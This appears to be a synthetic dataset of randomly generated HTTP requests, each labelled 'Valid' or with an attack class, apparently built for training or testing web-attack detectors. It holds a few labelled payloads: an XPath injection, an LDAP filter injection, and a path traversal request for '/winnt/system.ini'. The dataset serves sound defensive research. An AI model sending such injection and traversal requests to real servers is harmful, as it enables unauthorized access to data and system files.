From: stnsist@ee8nh.de
If-Modified-Since: Wed, 20 May 09 02:05:56 CET
If-Unmodified-Since: Mon, 15 Dec 08 14:53:49 UTC
If-Match: *
If-None-Match: "_L0rW5We9X6hq5jI0g6"
If-Range: Wed, 24 Mar 04 24:57:45 UTC
Max-Forwards: 2
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM Ym5pbE1FeWR0THJpZXNlaHp5bzNsc29Tb2F0c3BvaFRiRXVFcklh
Authorization: Basic clR5bDpjN2xOaHNtTA==
Range: 53057-
Referer: http://h5yehsof.cz/emdkuo.wmn
TE: chunked;q=0.4,deflate;q=0.3
Trailer: Authorization
User-Agent: c3H4tc http://www.t9Ed.st
UA-CPU: x86
UA-Disp: 8000,6644,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 212x4647
Via: 2.0 84.5.23.179, FTP/7.8 www.izel7.gif
Transfer-Encoding: gzip
Upgrade: tknsdI/6.1, bao9sk/7.3, wfso/2.7, lrm/1.0
Warning: 818 39.101.24.238 "Ei4etc3nfbsi2nwj" 
X-Forwarded-For: 251.229.233.197
X-Serial-Number: 175416
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20957
Start - Id: 15125
class: Valid
GET /Azes/xfeTwushenociDmyir4/oq-oY/saRiL3IeM/r8PCU@ucfY.R9vv/u66gboeaOHnE.css? HTTP/1.1
Host: 238.21.21.240:0
Connection: nNfh0e
Accept: image/png;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 65.10.135.69
Cookie: Ns2XoYDsLZ=6665502
Cookie2: $Version="7"
Date: Sat, 24 Jun 06 08:03:07 UTC
ETag: "C.MS2bhi6Vs@uvu__cz-"
Expect: 100-continue
From: rstu@ibae.fr
If-Modified-Since: Tue, 10 Mar 09 18:53:19 GMT
If-Unmodified-Since: Mon, 29 Mar 10 09:09:16 GMT
If-Match: "UUu-j@QFoFfD4HoXZ8T"
If-None-Match: *
If-Range: Mon, 08 Mar 04 07:11:59 GMT
Max-Forwards: 237
MIME-Version: 6.6
Pragma: eioetc='aeyisaq'
Proxy-Authorization: Digest qop=c1cio7ee
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: http://intu3aq.de/auaeo/GAcqbpdD.asp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.0; dr-wt; rv:6.9.2) Gecko/86366747
UA-CPU: 68000
UA-Disp: 203,474,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: 5.1 www.inomxie.shtml
Transfer-Encoding: shlah
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 761 102.136.242.239 "sf0lErlspe" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 0851506973
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15125
Start - Id: 15235
class: Valid
GET /iXFXqJSvA5V-iSEv/Rhkdiz1ouc7/sls0yassrTSdmhlsaa/aehay.jpg?asn2=H HTTP/1.1
Host: www.ewqabXstn.com:6
Connection: close
Accept: image/jpeg
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: v9hw='ebrmie'
Client-ip: 249.93.245.212
Cookie: WwpoioeriAe2Bio=qne;6eaNIvtbse=tTJiT;Ldylohnaad=jdcejln;noltyorntKtt=ls a(ehilc
Cookie2: $Version="112"
Date: Thu, 28 Sep 06 22:54:56 UTC
ETag: "J8fgc0aHA-UT2chR-"
Expect: 100-continue
From: rwLjhtn@hMidWa4.fr
If-Modified-Since: Thu, 01 Dec 05 11:23:52 UTC
If-Unmodified-Since: Mon, 10 Jul 06 13:36:47 GMT
If-Match: "b6AzjdMuwikfDkgrvYM"
If-None-Match: "cix7pR7M9vofj2ncK"
If-Range: "cjpLPgbEimCa@_@IGeA"
Max-Forwards: 627
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic YWVuYzplTnU0MWQ=
Range: 319-418673,22777-
Referer: /oR5eni/ehsiDi/gasN/7hty0eo.swf
TE: deflate,chunked
Trailer: From
User-Agent: Mozilla/0.1 (Machintosh; U; Mac OS X 8.3; hf-8l; rv:9.1.3) Gecko/00329402
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 175x9558
Via: FTP/3.3 86.64.146.6
Transfer-Encoding: gzip
Upgrade: szO45Q/7.7, hf6/5.3
Warning: 878 www.sRseiin.tiff "2seA8AidrH" 
X-Forwarded-For: 186.115.86.145
X-Serial-Number: 64170789223686
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15235
Start - Id: 10210
class: Valid
GET /8O86/3AH3HoTINo3twgcCvkl/T1u/n1aec0esvice1/hODkQUj8-SCS44y3/mnkk7ssaeali/ys/FnesNsii/uCmb/ntzyIoi.t.js?uu=iere&eya=soae4&LF58IchildgstbFt=926&Sedu=rxtermeHssh%29%3Ea9oaaw+lebin&jytIhnmn=node9fbp2+%28e%3A+rm%40n&uh6atlt=s2scru&thr5Rl4ueat=qI7pnZ2 HTTP/1.1
Host: 64.53.12.222
Connection: iyemn
Accept: text/*, video/*;q=0.2, application/x-tar
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 68.209.209.228
Cookie: bTaTus0ied2rcd=Oeinsertzohghsolc
Cookie2: $Version="59"
Date: Tue, 22 Jul 08 09:02:18 CET
ETag: "wfJSHyEnufrjs.Zn2j"
Expect: oeeSt
From: Ihr6E@hiaxciCr.gov
If-Modified-Since: Tue, 14 Oct 08 01:54:40 UTC
If-Unmodified-Since: Mon, 27 Dec 04 13:16:51 GMT
If-Match: "op6UgDcUFxTboEFAR@"
If-None-Match: *
If-Range: Wed, 19 Jul 06 22:20:18 UTC
Max-Forwards: 9065
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM bG9leGlSbnBrdWVuMVhoZXJtMGR4blNlbHRlbHdsYXRpMHNocmlvZDlwZG52em8=
Authorization: Digest opaque="delEi"
Range: 984-,23-,72-
Referer: http://www.lgcaftat.fr/ndorAlN.asmx
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.7 (compatible; Konqueror/5.4; Win 9x; G6rIippx)
UA-CPU: MIPS
UA-Disp: 6635,0350,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 099x017
Via: 7.4 106.22.10.217
Transfer-Encoding: deflate
Upgrade: ce2fw/5.5
Warning: 637 www.hs6E.png "t1aojshwaSSaeBsobih" "Fri, 24 Jun 05 14:32:42 CET"
X-Forwarded-For: 119.252.21.3
X-Serial-Number: 9799950017867099
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10210
Start - Id: 18692
class: Valid
GET /binG3euR6q1t/JMFwgetHC3vynn4systemH/oosypnmoyximseea/sf4fO99zO_P/nM6gand6QmqJcOI@/tAq/pXeufe2ilHw/nSQf1c_5xVz1F/pNRh8TW_igvUGKO/uhHcfb9uejDCLKQETLi/iimgpK.asmx?2qSTkdqRF=eezerjeaceres6s&IseattleaNe9gd=gshutdown&raangsne6iE31Ey=nlb&oeKro1adq=rfcatt HTTP/1.0
Host: 131.171.42.31
Connection: Taee
Accept: */*
Accept-Charset: x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=2501
Client-ip: 135.243.15.143
Cookie: ei=h2rh;hmg=sesy;ou3=4aso;0orGshne=teeN
Cookie2: $Version="46"
Date: Thu, 29 Jan 04 16:30:29 CET
ETag: "Qq1wpLUjZ4zji6rUl6O"
Expect: ohrnAtc
From: r6tpmn@ahrsteeike.st
If-Modified-Since: Thu, 23 Sep 04 07:13:29 CET
If-Unmodified-Since: Sat, 09 Dec 06 07:44:05 UTC
If-Match: "f7dJxW-Ea4957ok"
If-None-Match: *
If-Range: *
Max-Forwards: 629
MIME-Version: 4.4
Pragma: 0Gh1htFi='estf'
Proxy-Authorization: Basic dDFzcjphcGxtb2V0ZQ==
Authorization: enaes 8hf9b=6shEosry
Range: -0
Referer: http://W7eZlus.fr/aaEaeq6e/ik0Ec/pme5a.gz
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: crlelt (eyyEpEj; rzPgN9Dg; sxCARva0Gg; eQ0JPhLNX; x8s4xSMML)
UA-CPU: x86
UA-Disp: 4502,276,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8595x9488
Via: ddsa/7.0 www.lt6resgt.jpeg
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 343586
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18692
Start - Id: 13175
class: Valid
GET /oddsfEqoBpIYH/SnoipAphaE.tiff?hotqcuea=rb&einnal4=y6iRnXI&ueughL5mt2ej=ehLS5f HTTP/1.1
Host: www.trnltr.ch:80
Connection: keep-alive
Accept: audio/x-wav;q=0.6, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: uhd-UWa;q=0.9, p-puaba;q=0.0
Cache-Control: no-cache
Client-ip: 34.236.250.61
Cookie: nAtEraseb=8te e;aos6leed=403997;uRCexecE=[lbsdoo3og<q;vei4oosuo=a-Zcyj6GAr;astotnoiucxbfCe=h;UtlhttpZLGjtCZ=rnSbo7iqu
Cookie2: $Version="095"
Date: Fri, 16 Mar 07 08:33:22 CET
ETag: "n9tR8-lMN_crbqnE"
Expect: 100-continue
From: eswp2a@SmynxY.com
If-Modified-Since: Thu, 11 Mar 04 14:26:30 UTC
If-Unmodified-Since: Sun, 17 Oct 04 07:55:09 GMT
If-Match: *
If-None-Match: "ASnTNsDw38eZAB4_F2"
If-Range: Tue, 20 Mar 07 13:49:12 GMT
Max-Forwards: 228
MIME-Version: 6.3
Pragma: 2yy='yja'
Proxy-Authorization: Basic Zm5vdWE6b3R4dHM=
Authorization: NTLM a2Q0c3I0ZVVvZW5tZ0VvcWFyaWluc2RzdW8xdHdlbmg2
Range: 43542-753,-325241
Referer: /uynoBtw.js
TE: deflate;q=0.1,trailers,chunked;q=0.2
Trailer: From
User-Agent: Mozilla/1.9 (X11; U; Open BSD i586 4.4; te-ns; rv:1.6.8) Gecko/83243291
UA-CPU: Sparc
UA-Disp: 7860,6624,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6456x555
Via: 8.5 www.ueosol.css
Transfer-Encoding: Clvr; eOtse=hrobroeU
Upgrade: r7hret/3.9, mve/5.9, oiIbha/2.2, anpn/6.2, voe9h/2.5
Warning: 436 25.55.85.96:66207 "soslqahqAn" "Wed, 16 Jul 08 09:59:35 GMT"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2288271
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 13175
Start - Id: 22568
class: Valid
GET /pkyxHjpC6Jf/oHhttpsGFP_/Ko8eW2g5updatenpu0hH/k3pIBQK-dTvq/ib5Nf3T3juT@l23j9N/Eanti3etTata/qgvnJIm-tsDV91.mspx? HTTP/1.1
Host: 26.170.194.248
Connection: 8ae9ule
Accept: audio/basic;q=0.0, text/xml
Accept-Charset: iso-2022-kr;q=0.7, cp-936, macintosh;q=0.5, shift_jis;q=0.2, iso-2022-kr
Accept-Encoding: identity, identity, deflate
Accept-Language: fXvsdts7-el, jwePz-uf, re-legeenrX;q=0.7, d-wkyh, 1e-hcsclf;q=0.3
Cache-Control: min-fresh=32
Client-ip: 14.142.132.191
Cookie: E4deqlthoofz=7nlfis;c8AncTlYcE=8509566;luTgyBbitqeui=ktdTdrop;eihnbT=cnnee eoesock_streamtdn;ezprnltyuli=405
Cookie2: $Version="51"
Date: Sun, 08 Feb 09 03:08:30 CET
ETag: W/"XAsOYXqELAWcTGvV"
Expect: sbtwss=YalrsR9d;tefcoaav
From: tetoseli@i9ihet.it
If-Modified-Since: Sun, 31 Oct 04 01:31:09 UTC
If-Unmodified-Since: Tue, 05 Feb 08 05:24:15 UTC
If-Match: *
If-None-Match: "22jFQntsKMcztLPXNTn"
If-Range: Fri, 10 Oct 08 18:53:13 UTC
Max-Forwards: 2477
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dGhkZkJhc241Z2RlRXF6YWl4bGFobGFzOGhhcnJPYXR4dG90aGllbmhzcGdz
Authorization: Basic c2lyaHdhY3A6YXZ1dE8=
Range: 008-622747,-490549,85-794080
Referer: http://ntN3ue.be/ahea0so/cwioenu.png
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: pleMfnnBeutnl
UA-CPU: Sparc
UA-Disp: 5896,055,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1663x456
Via: b6e/8.5 197.166.82.16
Transfer-Encoding: identity
Upgrade: sric/4.6, ineo7/5.6, uiont9/0.3, wEco3/6.9
Warning: 651 www.nfit.gif "ieetdewtnneo6h" 
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 2569472
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22568
Start - Id: 49879
class: XPathInjection
GET /ir/edjIkMx@p9.WZch/PQHTGoOT@7BqA/s6hfdenbtrtlt.htm?04LNinputPDjC=42491&dmlh6rniyezieer=rotf0etyms&zhiaghn=78519&s4M=7901++++or++++62%2Fl%2Fet0%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D99%5D+++or++40%3D&iwhwchetitynEtg=rmtostdin%3C0ol+aaaew%3Fi%3E&et1r=ixTj3rnGM&alolheKb=h6c%27r2oleesm&ps7n=37&osst47s4=ao%7E&gs=63&jdysinldLsrein=hmctepe&tojenhtcram=cWHmrh&Yh9ut1Oea=seYn HTTP/1.1
Host: 14.71.97.117:80
Connection: close
Accept: text/*;q=0.5
Accept-Charset: cp-950;q=0.6, windows-1253, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=4201
Client-ip: 161.161.216.27
Cookie: abthytxOt=6;ti1t8rnvtzaz=arftThe1ts;uaegd=uaei;ndeqdGntxqe=9rha0nnipAsl;8efrGag=dedhrrtjgeiT4E5nm
Cookie2: $Version="5"
Date: Tue, 03 Feb 09 13:47:55 GMT
ETag: W/"hH71xME7IfcK@fLcorf4"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 02 Apr 06 11:18:22 UTC
If-Unmodified-Since: Fri, 25 May 07 13:22:22 UTC
If-Match: *
If-None-Match: "uZlf6YTitnEeNbpcG3e"
If-Range: Sun, 06 Aug 06 02:37:20 CET
Max-Forwards: 12
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /gesecny/hephasO.php4
TE: trailers,trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.4 (Windows; U; Windows NT 5.8; io-cc; rv:0.2.4) Gecko/26970239
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: 8.7 179.205.81.28
Transfer-Encoding: compress
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49879
Start - Id: 27611
class: Valid
GET /i6NL2iallxnN5/we.q6@Soi4uo9ly7iD_1/aoesss4ivbdce5/Ued26iechi5neattUl.cfm?5Vo5s2b.z=me%29os&elhrwb=r0AF&rnLhhiiu=%26oubinE&a0Lipm=Renif&jhoeeab=rgoGLdx.T HTTP/1.1
Host: www.ecnXz.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: *
Cache-Control: min-fresh=79
Client-ip: 70.6.137.206
Cookie: 5Hade=nIupdateg)[ste'w)<]ii7;meka=z/e=gsnodeoiayja4xei@) 
Cookie2: $Version="380"
Date: Tue, 24 Apr 07 04:27:54 UTC
ETag: W/"2JFkjBVhB8Pi_ph"
Expect: 100-continue
From: oieTnE@t0eayas.com
If-Modified-Since: Wed, 16 Apr 08 04:03:43 GMT
If-Unmodified-Since: Mon, 06 Jun 05 06:34:58 UTC
If-Match: "sskGDEsTKTMV-_leKUC"
If-None-Match: "7A6C14fSoHmnOw_"
If-Range: Sat, 27 Aug 05 20:32:19 CET
Max-Forwards: 2
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dHRmdHRhb3JvYWVSbmVlZWRtdHNvb2RDOW50bnJlaW82dHdObjBlbA==
Authorization: Basic N2xsdW45aTpkaHNyNw==
Range: -004669,-26019
Referer: /r2lbtd/mcuuTefs/0emejbi/tpeUncdd/dheNf.exe
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.8 (Windows; U; WinNT 4.1; ss-nd; rv:8.3.5) Gecko/95619956
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: 0.1 178.59.127.94
Transfer-Encoding: deflate
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27611
Start - Id: 14868
class: Valid
GET /780p1Ketc2/mnO3tdlhreme.sh?iaeivsirftmi=+&ihreubselUtkb=5&sicpm=fi2BSvnBB98k&xNqexec5QOYj=ere6n&wp-Sqngroup by__o1pT=G%3Csystemwiee&rutnoe=egnaT6nhTperkas&-window.openBTocjVR=sutSeoo8 HTTP/1.0
Host: 227.33.92.100:80
Connection: 6or8h5am
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.5, x-mac-chinesetrad;q=0.4, iso-2022-kr, x-mac-chinesesimp;q=0.6
Accept-Encoding: gzip;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-age=203
Client-ip: 239.109.47.175
Cookie: 3eR8Sdyp=84;1oOlttpm=071357
Cookie2: $Version="76"
Date: Tue, 14 Jul 09 19:09:28 UTC
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 6n8e
From: dtayi7@nIdTra.gov
If-Modified-Since: Tue, 25 Apr 06 17:27:47 GMT
If-Unmodified-Since: Wed, 06 Oct 04 08:56:13 CET
If-Match: "zpzxht9Ps_Ryr8Rhi"
If-None-Match: "-ZvH0G5sSFCUJRo"
If-Range: Wed, 02 Jan 08 21:16:50 CET
Max-Forwards: 5290
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: Basic NGFodFJvbjpUaXNpM08=
Range: -43,-61335,692292-223
Referer: http://l1lsq.cz/otnem.mdb
TE: gzip;q=0.1,trailers
Trailer: Referer
User-Agent: htut (tmKUIEng.; iVeY7Dwp; rWMmNzlC)
UA-CPU: Sparc
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: FTP/5.8 98.44.93.234:90
Transfer-Encoding: z3et
Upgrade: titwo/7.7
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 121.34.208.174
X-Serial-Number: 883982110
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14868
Start - Id: 17252
class: Valid
GET /eariJfbWn4e/hAtc/fzeuq5sar/tldpsrle/7EOCMI/Hsoriggzt/ie/snnhjni/tZLvY.cgi?4aoowas=tooCild&cwIh0_K7echox=60&omcom4gnom=2580&8ht=ht&ticdhpnffn=41761&snReoSibiinkqe=tOX2tEjR&rHu=rsg&leunlcwyhiyju=es1tsntnm2snsuro&hssouy=gEz&nits7rP=io%3El+nerPbm&nsa=oq8+e&nelknnuth7dnoa=7067 HTTP/1.1
Host: 54.130.242.84
Connection: keep-alive
Accept: video/quicktime, application/*;q=0.5, application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: usvti-gcOhsis;q=0.5
Cache-Control: max-age=32
Client-ip: 94.253.241.222
Cookie: ti5=ou|vtne3ho8];nmohhho=245320191
Cookie2: $Version="9"
Date: Sun, 25 Mar 07 10:24:53 GMT
ETag: "S@@1nfvdPNmj48qVNstc"
Expect: s3sfseb9=eog84p;tHio0o=j0ta
From: adrlde@epiahn7ua.fr
If-Modified-Since: Sat, 13 Dec 08 24:38:38 CET
If-Unmodified-Since: Tue, 14 Feb 06 08:11:53 CET
If-Match: *
If-None-Match: "KYONNLYXwmksuLrju"
If-Range: Fri, 28 May 04 18:52:36 CET
Max-Forwards: 43
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: pzv5it uqfl=dtdctoh
Authorization: Digest username="fiHp6n"
Range: -986,9134-
Referer: /szorsidr.jsp
TE: trailers,chunked;q=0.4
Trailer: Via
User-Agent: dteprssrregzseMcis
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 425x7082
Via: eyn/7.1 www.erent.jpg, 5.5 125.144.50.230, zniae/1.7 179.28.102.168
Transfer-Encoding: gzip
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17252
Start - Id: 13713
class: Valid
GET /yQt5azX6HbCI/bpr/dB/kGsoLt/lwZPiMXr9BZymSsU4/o5Oo.TK/etturcetl/n4meVYtz2twJgP/3kLemrebohsttsd/i8eheTrye9smO/h5owee/nNg.swf?tsrt=wXcV&ki0tgEumrusl=+tf&oibfitsuafe=1150&Dmi=4098275&Irbmeuuba=aB9J7WwqB&Ds=elL5zW9lGRFY&5rvbscripteFmXgZA=i%25+ra&ngtEBtthjlina=rlln&dTe=vli-r47ene&jc9n=%5Bre&c551erpaBH5s=5rIfI5WncS&by=ufevalu&GoNvVNhttpAdivfK=5 HTTP/1.0
Host: www.me9tt3a.it
Connection: mhn6a
Accept: audio/*, image/jpeg, video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=430
Client-ip: 198.120.84.137
Cookie: K-L5%uKf-kdiv9k=stdindo;o0gti6th6tsmit=cSGVra;ebnets6nwlpen=osntzy%7C5awcsO2
Cookie2: $Version="963"
Date: Thu, 05 Jan 06 19:48:16 CET
ETag: "UureB0BfE95zLJeb"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Sat, 20 May 06 07:51:30 GMT
If-Unmodified-Since: Mon, 23 May 05 18:43:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0230
MIME-Version: 4.2
Pragma: qmrniide='olaybo'
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: Digest nonce
Range: -2
Referer: /ltatt/eiearye/ainobs/cniesn1i/8Arout.mspx
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (X11; U; Open BSD i586 7.3; rp-tp; rv:6.1.0) Gecko/43399768
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8977x4193
Via: 8.5 46.38.50.167, FTP/9.5 225.79.163.251
Transfer-Encoding: identity
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 166 55.10.78.191 "aedstaedriNMcf474i" "Thu, 17 Mar 05 05:00:13 GMT"
X-Forwarded-For: 19.232.169.41
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13713
Start - Id: 38017
class: LdapInjection
GET /oe5n2orssNrmm/ifERAxfcRfuaBw2UiD9/oot/e1YQP@g.exe?abh=E7r+&5OFWFI=services&scswcIrefqtY=LdNfdAbyecumv&CBXF=%29+%28+++%7C++%28displayName%3Dhad*%29+%28name++%3D+had*+%29%28+mail%3Dhad*+++%29&nni5nussis=9069016171&iTarnytdailrnp7=0&ideiseiWr=rdt+h+5a%2Fmtsroy&unrEos5=stmpon+ HTTP/1.0
Host: 53.115.230.168
Connection: on15t5mo
Accept: image/jpeg;q=0.7, audio/*, audio/x-wav
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, deflate, identity;q=0.4, deflate
Accept-Language: e-mu0etish;q=0.5, taasf63-58;q=0.8, ehTr-veldfL;q=0.4, QdtlAmd-pmrtog;q=0.5
Cache-Control: min-fresh=943
Client-ip: 204.64.18.91
Cookie: hl9nZrnniyPtl=ftett8htif
Cookie2: $Version="3"
Date: Wed, 18 Nov 09 06:39:25 CET
ETag: "zGwbkaD56y2_UjA"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Sun, 31 May 09 19:13:56 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7094
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM dHNobXNmbGNyOXU5ZWllYXRuTmVhem9hQXNuZThhb2VldGE=
Range: 28-,220237-8,8-
Referer: /brdcpisy/ntjiato.php3
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Dium (e@dsGSuQ; aP7F8TFY; n0-44iJM; oTiStcS; igidIJ)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 576 www.4exea.gif "s8oN" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 9679089566014
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38017
Start - Id: 16028
class: Valid
GET /3eudejestugeetrriMae/sd16neni/rBwnull_wiframeYMCr2/tqhl.msf?tqt=encaiif1l&LUOiXDidX-O=7disrnaj&nda6R=HT5zns6eYutacsdin HTTP/1.1
Host: www.Th1N.com
Connection: close
Accept: text/*
Accept-Charset: ks_c_5601-1987;q=0.5, x-mac-roman;q=0.8
Accept-Encoding: gzip, identity, deflate;q=0.7, identity;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 231.166.107.18
Cookie: iiVReo=cf2e';06Itojbe=oLa;askabirsi0=piframels?hnndlyeia9;cmhtlpll0s=50
Cookie2: $Version="6"
Date: Mon, 05 Feb 07 10:50:24 GMT
ETag: "d_0jC2jHellSi@2BxW"
Expect: 100-continue
From: tAooDic@hfnEZVt.it
If-Modified-Since: Fri, 30 Dec 05 06:45:28 CET
If-Unmodified-Since: Tue, 17 Nov 09 07:36:20 UTC
If-Match: *
If-None-Match: "9XhQhDIz_vQMEnmy"
If-Range: "@gKaCSynWk7RYttg5d"
Max-Forwards: 81
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic c3NyTnplOmlkcm9vNnI=
Authorization: Digest qop=5iemopkt
Range: 120-88552
Referer: http://trnelTri.gov/2seie2S/jEaR9o.css
TE: gzip;q=0.4,gzip,chunked
Trailer: Pragma
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 1.2; ae-aq; rv:6.1.8) Gecko/19806804
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: rweta/0.6 www.alsFrs0h.htm, 3.9 www.gtit7pa.jpeg, 2.4 www.yadhlom.htm
Transfer-Encoding: compress
Upgrade: pnhh/6.6, iweta/0.9, 8roie/6.1
Warning: 192 www.smdny5nu.gif "em7hryt" "Wed, 17 Mar 10 12:26:18 GMT"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16028
Start - Id: 45101
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.toetTbyt.uk:6045
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.9
Accept-Language: id-9rhSn26N;q=0.7, eldeeoeu-7lar;q=0.4, qu8y5-e;q=0.1, enucrtn-f, efMhrH7-oa;q=0.4
Cache-Control: no-store
Client-ip: 229.13.49.114
Cookie: sedtph=3
Cookie2: $Version="8"
